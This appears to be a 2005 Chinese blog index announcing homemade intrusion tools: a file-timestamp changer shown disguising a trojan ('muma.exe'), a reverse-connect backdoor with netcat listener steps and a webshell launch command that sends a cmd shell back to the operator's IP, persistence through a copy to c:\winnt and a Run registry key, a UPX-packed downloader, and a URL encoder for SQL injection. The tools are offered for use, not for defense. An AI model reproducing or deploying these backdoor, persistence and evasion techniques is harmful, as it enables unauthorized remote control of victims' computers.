setTime Ver 1.0 hnxyy[F.S.T], 2005/6/22
http://www.wrsky.com, QQ:19026695
文件时间修改器 1.0
Usage: setTime OldFile NewFile
Example: setTime cmd.exe muma.exe阅读全文>
发表于 @ 2005年06月22日 20:46:00|评论(loading...)|编辑
Winsock2为kol socket单元文件,修改自c版代码binder2.c
使用说明:
binder2.exe 反弹式后门程序
简介:
在WEB的渗透测试中,我们经常会遇到主机端口被过滤的情况,虽然成功创建后门,但是连接不上,这时,这个反弹式后门也许能起上点作用.
用法:
1. 在本地机器监听一个端口:
netcat -vv -l -p 80
2. 通过webShell或是别的什么运行后门:
kol_binder2 80 youIPadd
3. 本地监听端口将截获一个来自远程主机的cmd.
注意:
程序本身会创建一个自启动方法, 如果没有参数的命令,会连接默认IP和默认端口,这个exe默认的IP地址是内网地址127.0.0.1,端口1234.
程序会复制自身到c:\winnt\下名为binder2.exe,并在
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run 下创建启动键. 如果需要卸载,请使用 kol_binder阅读全文>
发表于 @ 2005年06月16日 16:28:00|评论(loading...)|编辑
server.exe为服务端程序,用upx加壳后可达到9k左右,只是简单调用UrlDownloadToFile函数实现,没什么难度。
下载地址和保存路径长度设定为64个字节,主要是为了方便计算偏移地址。
brcc.bat设为你Delphi目录下bin子目录的路径。
author:hnxyy
QQ:19026695
date:2005/6/12阅读全文>
发表于 @ 2005年06月13日 08:29:00|评论(loading...)|编辑
url编码与解码工具附代码,代码很简单,做sql注入分析时经常用到,但一时又找不到,就写了一个
阅读全文>
发表于 @ 2005年06月01日 08:42:00|评论(loading...)|编辑